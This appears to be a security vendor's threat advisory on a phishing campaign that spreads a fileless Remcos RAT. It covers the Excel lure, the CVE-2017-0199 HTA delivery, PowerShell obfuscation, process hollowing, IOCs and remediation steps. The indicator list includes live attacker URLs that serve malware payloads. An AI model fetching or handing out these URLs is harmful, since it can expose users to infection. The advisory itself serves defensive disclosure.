Multiple Adobe Experience Manager Vulnerabilities
November 11, 2024Multiple GitHub Enterprise Server Vulnerabilities
November 11, 2024Multiple Adobe Experience Manager Vulnerabilities
November 11, 2024Multiple GitHub Enterprise Server Vulnerabilities
November 11, 2024Severity
High
Analysis Summary
Researchers have uncovered a new phishing campaign that disseminates a fileless version of Remcos RAT, a well-known commercial malware. Remcos RAT gives customers access to a variety of cutting-edge tools that enable them to remotely control their computers. Threat actors have, however, misused Remcos to obtain private data from victims and take over their computers remotely to carry out additional nefarious deeds.
The attack begins with a phishing email that entices users to open a Microsoft Excel attachment by using lures related to purchase orders. The malicious Excel document downloads an HTML Application (HTA) file from a remote server and launches it using mshta.exe by taking advantage of a known remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8).
To avoid detection, the HTA file is encased in several layers of PowerShell, JavaScript, and Visual Basic Script code. According to the researchers, its primary duty is to obtain and run an executable file from the same server. To make detection more difficult, the malware then uses a variety of anti-analysis and anti-debugging measures in addition to running another obfuscated PowerShell program. To download and execute Remcos RAT, the malicious code next uses process hollowing. It launches Remcos in the memory of the running process instead of storing the Remcos file in a local file. It is a fileless version of Remcos, to put it another way.
Remcos RAT may remotely carry out commands sent by the attacker via a command-and-control (C2) server and is capable of gathering a variety of data from the compromised host, including system metadata. With the help of these commands, the program can harvest files, list and end processes, control system services, modify the Windows Registry, run commands and scripts, take screenshots, change the desktop wallpaper of a victim, activate the camera and microphone, download more payloads, record the screen, and even turn off keyboard and mouse input.
Impact
- Unauthorized Access
- Sensitive Data Theft
- Code Execution
- Security Bypass
- Cyber Espionage
Indicators of Compromise
IP
- 192.3.220.22
- 107.173.4.16
MD5
- 3763d0c03b5f6228ba0b06c464a0828d
- c443d03e485232a860b726fc83593004
- 450228d72f9f726b645c55bbbc6db905
- 552ed0904239d64db1895620b38dc799
- 14c1d52f24f29389597b36dcfc90b95a
- 3aaf33e220a7bbed189a27a797e1b351
SHA-256
- 4a670e3d4b8481ced88c74458fec448a0fe40064ab2b1b00a289ab504015e944
- f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
- 9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
- d4d98fdbe306d61986bed62340744554e0a288c5a804ed5c924f66885cbf3514
- f9b744d0223efe3c01c94d526881a95523c2f5e457f03774dd1d661944e60852
- 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d
SHA-1
- d6209f26483f566417ec4adedcc9f54c56862d35
- 6b556d04962638694402d15b7fa24b6bd6b1d1f4
- b26075c51a4681f2ff7407188f5e9480545a7aca
- 8a6a6c6efd31b04c716cde1783b45783f2843e20
- a2578253f17b5f0ef989965dcb74aebb60763b2d
- 8699ef56f096082c5c97cf9e9611d5aec58e7a86
URL
- https://og1.in/2Rxzb3
- http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
- http://192.3.220.22/hFXELFSwRHRwqbE214.bin
- http://192.3.220.22/430/dllhost.exe
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade any platforms and software timely and make it into a standard security policy.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.